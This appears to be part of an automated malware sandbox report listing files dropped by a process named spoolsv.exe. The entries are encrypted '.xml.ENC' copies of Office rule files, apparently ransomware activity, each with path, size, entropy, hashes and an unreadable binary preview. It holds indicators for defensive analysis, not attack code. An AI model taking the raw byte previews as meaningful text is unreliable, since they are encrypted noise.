                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f.%.7.o..K....~.Sb.m.0.:9.E.:....*...E....w#.A.P.m.....b.@....PM.-bt.l.qJ:..Yj*.s..g.}....).r....T.k..kW.M...g..m.`..s..>P...}v....f....X.w.b...dl.{..f...5. ..}.r.u.e..Y:.^....p_(IkJ.kP].8.k+.<i......X.H..!..aarP.$..".D.g..5.I.`...D..s*.........Nl.....PV.*.g)..../.......f.U.4:$......*.{ ...y..P.y}.V.(.c....l..W...~.x.,1m..y..%.u..u.j6..;.=u8.f.$....8........p.g.....G.BlL.u....P......d.prt...Kb...6..:E.z^..o...c.....K.X...+v...M.n.&..F......P....:."...ZM.=g...j..v........}.G.{.W..EY.D........[p;...M.......*Fe..l.<. ..N....vB.........0y.+x.K._rS...Hi..o.7.........`8..@J./].:2./ME....aj;b..h.$Uk..9z.A.....A.....$.T..`...'0.N../..m....`.....g...{0.p...rM..\.o.e.K.......e..3........{..=...u.\.f.?a..'..b....:.6.&8..S..&.0.f<*','t?.....\.y........".G!l..}u...*A..7..M<W.5..t.~.h..:W.4Q.\+.z.%c...;.s~...Cz....k......[.o.n7#.U.:6WH..$u..)......,%.z...N.|...I>.t.....2{....x..'..x..,].~X.K'..q..=..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule120119v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1344
                                                                                                                                                                                                                                                      Entropy (8bit):7.856603026736885
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:++pSQsOy5YsMPgG/KHYg0KlIz8K+lr3qebcgk4cXnkg6ETET6JkkOH:++1NkYBCe8Rh6VJXnX/TET6J1C
                                                                                                                                                                                                                                                      MD5:B112CD084F8AA6ED6B5B30DD72046F4A
                                                                                                                                                                                                                                                      SHA1:91EF8FAA27EF93CCDAEE4F99A67E42B5F5EBFF27
                                                                                                                                                                                                                                                      SHA-256:25C727AFF7F824A35551CBAAEB6BB2F3AD5547590923FD3F75CF1154180C1084
                                                                                                                                                                                                                                                      SHA-512:D8ACD29C0849B7AB294CA72B5266DD97C08D2A51048B1BD8B6159BF8406228DDD57496129F0E0A01FA7234A54F317D5D727C2888F7CBFDFDA80D5D72AC5C7B11
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f...]....;Ma............_.....o....S..Zk..._.6,.....y...*...z.......m."_7.2.1v..L@..B.....v.....x.>..dKU..EV..'.G.MmpBJ?.F.......Y..*..I......1...U..7.R..jg.Bj.Z?...N_.(9.Ji..M..%3..p..~..LB..J.u`]..B...i..k....;{..W.7.P?N.k]V?.U.I......&..8......*...fF..du....H.(..z...q..wC.3^.;K....NV.W#...h....u-...:%.+...s........0.~=.~d..y.._3.21.....m.=j.H.rAaR.$.>..=...6..e.w..\........mv.......jG.......5.F]5t...1.FzB..".y...9....9fU..(.`UK.-..J.=..ua......$....B.t...........8%:"R.......'..h`..j..S.RUfh.a<".lt.$.S.{..U..:n"...........Q.x.5F.J].q.4...>Ys..CP.k............m...~.$3......&....V.Z..wQk....n....8.].....^h..&..k.g.<.r,.V...K.(...K...sP..^..-....d.$...N...O..@.M...c.......$4W.+.F.k.?..YY.5..G?.t.....G".Y..9m.9.V:.........k....S.(SO..j..........[O@..1jp..PW./Ez.....W.Wl....Lo...@X+..+..t.7...?2.z..9eV}......q...:..b...V..'..j.5.).r.Pg.z......OW.s..}..<..0......^....$.K.4.hnV..........w.Q/#...0...z..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule120402v21.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3792
                                                                                                                                                                                                                                                      Entropy (8bit):7.952346848786382
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:++AH+4ZFm3HhqJzJINSrguZjf7lrVyPwezZjZ0pV9xNPo:++Ae4Pm345rg077lrVyPwgZl0JQ
                                                                                                                                                                                                                                                      MD5:06AAC91265C0788CC26D16AE7A7C85CC
                                                                                                                                                                                                                                                      SHA1:26FC21A3D8E4827089B5C19ADDD427157A7B9EA8
                                                                                                                                                                                                                                                      SHA-256:1F7D4A45D33F63716D64A86A95765AC8FFBDA49B9AF41E39D04245BE78CAF425
                                                                                                                                                                                                                                                      SHA-512:A49047788906EADDECC3988F20C1418409BF85D0C2C8AA01401715232F941BFBC01573DBE3F85CBAB54179655B7D9DE2E008D0101AFE36F2C1D4B42A6B316328
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..0.Z.N.2....d1=f...M]...V.3.'.KP<..ae...JK..".g\&7T~......yW8.....2.I\.PR..Ww..+hK.D..Z.k..E..y...0.....F{\l....0...1.[..){...e9...<.....Uo.Hx.7.....tb...*..6.v..A.G..3..?.ry....l..-....ut...l..........:.-..*...,.>...A.'....J........BJ.u......b.|..\.c.=.s.$<hZ/...{.Wwa.[.1.`.n.q.qF...k....?.6..'#..O...W..i..^.H...z....1-...&./!.j.\.<k8H;H.].....V..y...O...Ii<.IrPJ....2...........f...X..1..3..5.A=..Zl..f".ll1..HOP.....l..%.dl".4...g.x......iA..tA.o<..e..%....).H.[.^.i.n..>...n\T]....7.l...m\.y.o.O.kYlk`H%8..!..>F7..y....&}a..(..;...x._Y..)...U.....pv....y.c3...ER.I.ok.O.|}...<.D..]...:..t.R.)...6.j$."H......b.Ec..B.e...f.#w7...4.p.o......:.....B.rI.Kf...sq./.-n...h!L.......{..)O....*./.}....$m@..-.E{6E ..!dq.SP..Y.."p...v.....d...S.:.......=...].h...C..1...u.."..R..!%...-..(.PI.......F...T..d.oe5fD.....,!..8...Y..O.zzQs<#........l...[..w..9"..Bf...E.3p.'vy.-.M.v .....lR.Q.yf.M'.J#D.....Ov.m..1..y:..8[.O.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule120600v4.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2992
                                                                                                                                                                                                                                                      Entropy (8bit):7.941267310363307
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/4zNqiulLMcU5nXZGnJtX2JvOvcqU48uEyA78ZTFDuklBDN4P57W6Sv7Zl9qMpXA:AsieMcUvuJ8JhGXlBWh7W6alsEw
                                                                                                                                                                                                                                                      MD5:6CFFC915F55F976EA015E67D17C19505
                                                                                                                                                                                                                                                      SHA1:24D87D62DE273BD6E4DFAD0EFA9569350BCBE844
                                                                                                                                                                                                                                                      SHA-256:9F9C5E968BDBABC9CFC68BED8CF2106A660A2040D7097C8B6B98D2727C520390
                                                                                                                                                                                                                                                      SHA-512:828240B70D853E2E0B11837290EC97D2A7EFEBFB2A0FC220663CBA38831B7C7B67F6AB2EBA226C3E9BFFADAC8593B4B308C266AB6494E6AC339BAF2BC6514F02
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.UJ9....<..:$m.7.^.`..=.........a...e_..{...h.?...J..Ly....Fw....g;sV...{^q....T0+ri.../q.b..G...nH...U..W.-...RM.......K.\.QI......C...!.Z1.2,.-r`" .3.....L.......a.<h.y.!..Zd..,.(.L.Z...f..".#..c.[R5.....-..)c...|a(.|i...M...I..//ZT....*}%F*..jv...8...4..O{RV1.g4.Az...Uq.#x...4.I...qU......~@.5..9.....(..".[...&d..>..h&..i|.......B!@.J.S..l9|...yg.:.Z...x.m{.H..S.:..w....K.Yy......c.....H.f.Y.P.....`....j.Z..].+...$./.Y!.......C..}/E.=T}.K.m.4.1...0}) .[-l..r.@.....c...^B.~.G]..%=C..I..E..<......*#..@.C...Bd...9v.X..R....j./._$.....,.{A.U...W..3..g..I..Jx..B._n4.f....=./-.....Q...E:n G1.~.@.N...MB%...!.....v.U.&.....(.TaS..V]g.|....}p.....-E/7/...]e.4.i...-30s]..........7....r..z.).....,...s....x..+}@+' n.u.pH.vy......z......I....'+xz....J...-.9....A.Z..<. .Wp...n..8.k<."".%.7..{P..jK...P....b.._'..........SB_.....[...I...#.....2~.x..U..D..J...D+. ..8H4".s.{W.'......o...`.{~.i.....&.......u..P

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule120608v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2176
                                                                                                                                                                                                                                                      Entropy (8bit):7.906082753738502
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:/Rw9jSQa3o8Vf6YDLNGOK8MYuRlQTh/3CNN45DE43aez:5QSQa3Ff64LdQFRlQ5cwz
                                                                                                                                                                                                                                                      MD5:A1A5E9BF0E7825690F6821D56C323040
                                                                                                                                                                                                                                                      SHA1:95436B6089CC47F3DDA40C52A7EFD598C9AFEFDE
                                                                                                                                                                                                                                                      SHA-256:55DACB8748F3CBA2CE51ED922477047A51901A4EA5D57A482B6FA5B5E7C6C6D7
                                                                                                                                                                                                                                                      SHA-512:AF1AC1DDC7D4F8CC8003C250217C0A2B82C4451707024BD743635B3472524BE69960118D13CD9F2C71A61FB6B56C7BC76B75EAF504F007D399B8524E1332BA93
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....S..1V,>...O..(-.......b..g+9.......7R.3....8$.%..h4.l..x.2...=9L..(W.._0......t..q,.3.A..O.xt6(.g..CF.....D:.S.k.s((...K................=-x..W.v^C.....|..`.By.^..PF"?_.e...=.l.*.Q,t.W........:h.I...;$(.z.Tt.U.]...).....A+...wV.2M.j.....u.|.|..Y:W..Y..!l.........0.-..}55...d....b...x....3./O?.(..+..{......K.(Y2..0.L........)e.?.q...+.5.......e#..........X..d..|....l.I.9. Vc.J.c..2dj.riw.....-L.4...H...{.....I.0....(........`$^J.Q.z2....@/..R.!'.>.:.Z.9<.E.kF'#.TH:.Pz...0.UM[...)..=]Nn...X......E..T.G......Y.Ez.n...........M.DA8?..d..{Z_..%..w4t..j ..v.k....._:.&+....].9.`U. ,.0.Ax.O4+....]...]..$=.5X.TC.Lc.F....R...5.7s.P"r6....\....0.....g..f...e.&xw.(.y.gqX....umTW..l.D...=O.B7|0_.+.j....Vo....w}..+.x..F;*......og..^Pl9....0.U..0..w.......=..<..Y2......_..S.....|..\...,.w@.G.....V..]*.^....?.Q.... BZ).mI..v.i.:.^..{.,.V.....W..z...ges...<.<.Q..~..$...s.'.{.0.-..T.....`Y.b...j

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule224900v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):448
                                                                                                                                                                                                                                                      Entropy (8bit):7.503016600787876
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmhRtaQSckiR2RkYMdBzfbcR+o417oOUTG:+hRt4JofbcbsExG
                                                                                                                                                                                                                                                      MD5:BBD196E197056BC85F8C41C277DCF1AB
                                                                                                                                                                                                                                                      SHA1:343B8FC2BA220032919EABFA89ECCA1751543390
                                                                                                                                                                                                                                                      SHA-256:1AF8F62E24E53126CECB0534E1EAE2D40EC7F9A9F44D94537162E38BF1DFB514
                                                                                                                                                                                                                                                      SHA-512:79C6816E5F7C4278C1BE00E09CB5E67F7EDE3A20AF4A814B414CC9A209092D1A8CBF263EAAF9CAD28FD4B8C4FF28F983662BF0E2840DA828B220F37E601902F4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...IR.e..x.K..k8nc...wIM.._tv..>.rg...~.J&..92...+..aPF.\..S.0&...r...|].%^......|._c....E.5.y. .ST=,...c:...[.T.z[x.9~...g..x...i4.T.....N.Lu~R.3.&t.?.i...w.d........z.5..z.^.j..........,.....j.h..v.]Ab..r..Q..$;........YC_=..F....q.......W.[.<#.B2..._..,.1@...=...$jx.,..&^...V..X..I....4Vc..l^g...Gh.%....2...D.K.....w..^.S.....r..T..R.1.m.q......j.....@.y.i.d#.,QZ..]i.'....K.=.\.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule224901v11.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2288
                                                                                                                                                                                                                                                      Entropy (8bit):7.916212494975216
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:+Cscdy6wL8+CY9PxGY/7bw4n5UURzaixen5tYDh:+Cscdy6g8lY9psoxRQzWh
                                                                                                                                                                                                                                                      MD5:1BC9547E076868B709AEEF92F56827E2
                                                                                                                                                                                                                                                      SHA1:60B52BA30C26A2D1ED28EF6F9D4153B5CFEC4CA4
                                                                                                                                                                                                                                                      SHA-256:98915F5806F3F914E10BD73D5184BA14B9AEC896B1C3BC3FEBFB8421BD1BEBC4
                                                                                                                                                                                                                                                      SHA-512:48DDAA9EF49CC63E61216BCDE358E4A77281E516A582EEE1D5DF1A609F3E0DBA511503796755006A3929D4E06D1D1BEB920C77B2A682685AABE1BD28633B9EFF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I..[~5QUm.@.k0.W.m..K....\1.`.("i.}.....G2..".g.^My.,..=..fk.O .L..?.2...kW>A.MB..../.|.'8.nb....G..{.^../..Y.+|..}y...v..8.a....Q..y..e`.8c..c....L.6`e......W..:A,........I.......l..Q.....K^7E._j.!.'.'..6.jU..z.......I.[..$..r. =>T..6 :...FR...8}..H."i.....}.1....sh...6...w.....?..,$.y..p.<8.T..`8..z!.......a...H..*.a.&.uD6.....2..;.X..o.....Vo.|.mX..G.`......,$3?....[.....N....l..9 ..w=`&>^s..^.2u.....\1`+.....V.so.Q{ .y....*.`.ce;L.......Y...xc.].^@.d.48..t.#.t#...0....(M.=...[.....A.......J...i.9F.|...j.)=...l...[]P..._..@k.....f/..0H.E...eC.n]..yU.Y./p..k..C/.7..O........G."..S.e.h.......yu...9(;.'x.C)U..C.U....#.8....g..K._..O....*8.:..iuJ90g...`..B<.9_.o.!.......T.Ww....u..3......+2.....8....h.....`=%..k.-..O..z.... zv.7.J.j.....%'..=............\.....s.Z .....8..cU......G.{.!J>C...~.S.......g.R..a.N.qs.2.|..Z%B.<.A6.m..q.gu..'dWm....e.5.\`......w....n.bh...x.O..r..8}..X...v..k.j8?..........u

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule224902v2.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):464
                                                                                                                                                                                                                                                      Entropy (8bit):7.5632115393695925
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmxW6/rxsa+UAygC0zKelL2a8duWDA/t7b5n:+x5dsfUKzDSuWDA/tB
                                                                                                                                                                                                                                                      MD5:2CA62E0B19CAF180B9964D32D5BE0145
                                                                                                                                                                                                                                                      SHA1:6BE1F48D3613CB1EF603C99767762B0F62640732
                                                                                                                                                                                                                                                      SHA-256:05E5037816B92200F3C36F1AF9D3C3986BA77F73AC88156DCFEACE990C737DEB
                                                                                                                                                                                                                                                      SHA-512:CD94EBA6873F2FA322E3067722392D9070B8CDD370C9AD7E159EC86502360005E42CE63B7259AAF530F812BDC0AD84ECA470290790C081BF1614E8548FDF5535
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I...<...%..zI;."..5g.`6<..)l6M!..9z.3ixZ.....W}@...V........MU...S....(.%f.......CLI:.#8...l.....p .Qt...+..3W{[E9..&.2.Sm.9\.D.k.....*....6......I.h@..'.B..Xo...L..si/.].8.k7..'@..W..b.-..=...E:5.0...G(o&....Q....N.t.......i.U......../......f.f..|..\.q1f...7....G..7.[..c2..D.....^.......w.....g.$..........m...;Q..=......%........%U.D....o.Y.B.8.|..a-o.f#......O.D..A1.].UrIH..&.U..E..8..n....pE.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule226009v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):528
                                                                                                                                                                                                                                                      Entropy (8bit):7.667043986273599
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:fmbii+al4nLp2XGR+RA5elMRPQMGnBDPR/glnZRaoTru3K5Y2Bbdn:++lNp2XGiSKwNwk3R1rWIBZ
                                                                                                                                                                                                                                                      MD5:C6C5C8F650139357787CDE530EBF8595
                                                                                                                                                                                                                                                      SHA1:04D8FE56948453B1B32296ED15C5A352C1D7E49C
                                                                                                                                                                                                                                                      SHA-256:18082AA41953F457EA8AD142D2ACBDFD299ED958767719A376C11C65D9E39FE5
                                                                                                                                                                                                                                                      SHA-512:943F6491A822C5504FE3475C09D11A96A2AAA26F35D7696DF19039BA49C96B5B321143F993CE009F0689AB61C20D4889155815B19A7713B8904AA1CA0926F803
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...Id...#..&..]1..;...a.1.\..=..;Ra.....A.$.t..F.Jg....:..=+..2.?..0[.@!v..g..I.V......X|_..Qx|...(.j..\.o......V.'.;w.K....L....O...h.7?I..~H.Ob.T.%... @.U.t.z..1j. J<..:..I.CrY.`|Kg.. .Y.......F..M.?.&..9..;...9..+Hv.@.BW.&#&....%..ha!.3...2.2.NU..%..v-.\.M.K..,}.e".^..nv..%.4..M...`.....x..7U.....g.5...-.N..&-CE/w.E.s.y..G.?hZ4r....`..L...c.....L5..x..&...Z( y...A.F]B2L.V....$.TD.i9.64..6.z.z5.4~.R............./.k../I~/.P.......I..a......p.P.A.Ky...s..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230104v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2816
                                                                                                                                                                                                                                                      Entropy (8bit):7.939629943252759
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:+KTHWEe441zUOtjUIq6PHoisq2k6O9E3lvxjtCjfgED3dq:+Kf6zUAjUIq6vaoAbjt2PD0
                                                                                                                                                                                                                                                      MD5:28392C727CD5FEF750FF144D491F2DF7
                                                                                                                                                                                                                                                      SHA1:5F1363DD6E02FB1F525BCEE9279E1518FF7DBB20
                                                                                                                                                                                                                                                      SHA-256:9DE2E6DA81A548B6E39DD9D6BDE37A3771CB0FC30CBF786E832C497839825464
                                                                                                                                                                                                                                                      SHA-512:2E390193C23D15DBCFE6B289ED4E304E140BC4477AD0859B1695C91B65E86B221F5B694AAAE33DCBFBB51D476AA72FB9A11F338937F44FF6D67E95A35F985FE3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...IE..M}G.".a...N....}..y.xN.D.."y.J...N`.....(..`..=...PTi.`r[)Q4an........vj1].B.^...8.~_.....1+Do......-.u.M.#..OB.ct4"..j..n.JU=.-.?..#.P;....n...3[q&.. V..x...]...&...59..u..}-.tDJ...A..h........C....Z.SH.c..\u.M.ZV......gj~.Z4..Wh......p..)h..o9.`..oR1.&.{..'...7....?dm.K.l.\J.pR.V..v}Gz..^).$...#.a.LN ...2....PJ./.. ....p.....Jr....{d)T.....J.i.%<...Vm@].....e..o1.b.A3........(...SF}..c.....>.Hk8(..K...?....e>..7.a........J.X.Ic....Ia......O..9S...'.S..)=.U3..Y.P.,.....l.t..W.{.....%...D....}.V...iaa;. ....w{.M...L...V......d!..-..O..\...f.(..n....:....g.I.2.nU....V.g..4..cI..x......;.rGB....R.+)$..N..$.@.1.^$.....f|.d.,.!.."...!...[.!.a..*u.(..E..EO../..<{....>W.X.....aF...SQ.$6+|:..S.HU........Kv...l...C...6c.G...v.....|j.v.O2..-...D.m.z............y...P.l...p.2K..._....1cH...p.?..4...!<....qF..._......y....n.......u..."....m......'T..m...#......#.bw $..B.DcE.0f.W1...K8...:.bVS.o.h

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230157v0.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1904
                                                                                                                                                                                                                                                      Entropy (8bit):7.909233306246906
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:+vYMgGpAZW1LburocougJHCtPaO/cYPH7yw0ff:+vYuPtEg44om
                                                                                                                                                                                                                                                      MD5:F4FAEF5D8BC44E41B3B7AB22E8783118
                                                                                                                                                                                                                                                      SHA1:385D26E55DA7935453DE9E31C2A26BEE35F0ED1F
                                                                                                                                                                                                                                                      SHA-256:C4579AACD1301E944735C7CD20C3E1E5555765EB5142B929A924968F732E7F45
                                                                                                                                                                                                                                                      SHA-512:4EF776781C3801CD66D445230E6AAFD6A8F9332F91A611B3BE6B4D076CEFC9A8B48762362EA32B19F4DF054A3479C15E1A4CFDB87359FD9C1546F23F5ED41E0F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...Iz.M.`......9..a.c...:...:..5.HJ......=...0..FVh.J.F?gSa.S.9.3&....X.F.4.z..R....>...G../..I.D...<..d.........7z.x.|....Dm.f..YP...B.o5....>....z..:?.......M.5...#d..L=Z....E.H]z.09.HE._....'...|qq.}.....2..9QULH..o.w.....}.|..,.Hsn........;......N.......[y...H.)....l,...#..]Vi......:B...#PBw6...F.r...DvP.WF....a..).4..cR..<.B{D..n.r|..7.%.......U....9&.|..#............0[...X...$.<.D.\lR.....&.bd>.....Zad...6.h.P.B..)*.....I.S.EQr.0b.C.ca5v.I.P.0..|...9..vpY.;I..>v.].z....f&.^V..@.........r....F..e..L.R.O....me.d..#...`:y.,p.x.5...7.....1(.Y!o7....Hkn":|...V..........V.._.....Z..(pJs....Hr..E....Mw.H(oX(m. .~.<.;.........L/z.?...-.K......b8.-.P.i< &{!GP...';..$.....OI<6.$.JN.{_..a..|..S..I.37o...'....#..#.O+"J.v.7h.....p..r$*{.ep....s..P1..H...?=.I..z9Kdt=zS.....h.i...R......?&.}+_........,J........lu%..JT.....@.'.,...YA.aG'|.....J~..6.SH.....*.kA.[?.e..>.&....,_..}.b.\.$G....=+..k.o&

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230158v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1600
                                                                                                                                                                                                                                                      Entropy (8bit):7.882604835678009
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:+4YDgtxAwYJ2SdU7gKR+NXDimWbYYTxJMXcM//5:+4MgtxAjDa7gKR+dDrWs+LMXckR
                                                                                                                                                                                                                                                      MD5:7E7B09BFCFD27678E70EE4CAC4726FCC
                                                                                                                                                                                                                                                      SHA1:BC4DB642BE2A093CF7C3640AB6843BE455A8CF7F
                                                                                                                                                                                                                                                      SHA-256:CB1CA85BF4DB486B1F83E0193ECDCD7B96625B9D27097211E7A496391247AFC4
                                                                                                                                                                                                                                                      SHA-512:915ED19884268CEC3D65F388DBEE43BE8720859AABB14F56135D602697AD10D826FDF68B856C2F6B74BA644F58B7BCD381D740B4448B39FAE4FE3400E56CBA0F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..>.?..2..Z...I..Q9k..`1.)...MF...{@..-..RJ..*.Q.z.d.KN6r..!Q/..z..Sp.)..W...Q...a.!...-.\...$...{.#[.#......m..V.\..h..K..[.X....b.........B..)R...N$....]....&...>...a..-...2p...1RD..=e.....{v.....w...k.@.A.p..C. .....!.'._......2W.._Vv.e..:...p...}"......I.6G-.F7.T.....s...?...8..H..a....>..c."....Z.S.(.d..qn.ww.....F...J.R.0..Y.<...~...H..N.....@._.a. .y....i....&..>Z.w.X....U..Q.nN2......&".htlL=t.b} Y.Ei...u.V!...7....x.k.....I.vxR...-e....#C.8.|.t.BWB..Txv.....D.Cm...Qz0..j..a.... .....?/.'[...c.$hy.n../.+.L.5].?.1.G.....V..<...#O... .j.....*.|.XK.n$S....4.P...gM.t....z.s8....B..m9.i_.oS..m.jc..{....{jb.V`.....Bg.....x-.G:FmS'.$..e...r...\.V*..2..F9.NC.!.....0....7r.b...|".Ih..PMcv1.hu.b3:.t..,q!.y.&......I.._z".8..a.V..v.M.\~!a,....e...K.$..+...5l..*N.Z...J.4..3GS.......>....K...z. .....Q..R>..m...hb..f...W.O..#.I.@..p1...l.-.I<.$.&..sw....D.........z,.4t/D....tV..-.m.RS..(..L.a@.(.N.......oIX..^.........^

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule230162v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1696
                                                                                                                                                                                                                                                      Entropy (8bit):7.883712410965589
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:+TUIxa+Mn23vro1dHt21kqWZcj1a0H7zCTsmh:+TUk3vE19okqWR0bzCTsE
                                                                                                                                                                                                                                                      MD5:7680051D17266DF3A17C6D64A5641978
                                                                                                                                                                                                                                                      SHA1:A0F3191ABC964420830DADA2994687B2A742B952
                                                                                                                                                                                                                                                      SHA-256:3A03FC1DC2258B7CA54E22728D248E29437AA843A4F6DBA7E1C64BA67853875C
                                                                                                                                                                                                                                                      SHA-512:0252D4EA42B1D48D6181369B356F80F6BDA9CABDD9D0D6B67984203B869532CC51E01E05594459FCCE03BD79FA247B18D6224C6D386A9F63846CB2551D6BB740
                                                                                                                                                                                                                                                      Malicious:false
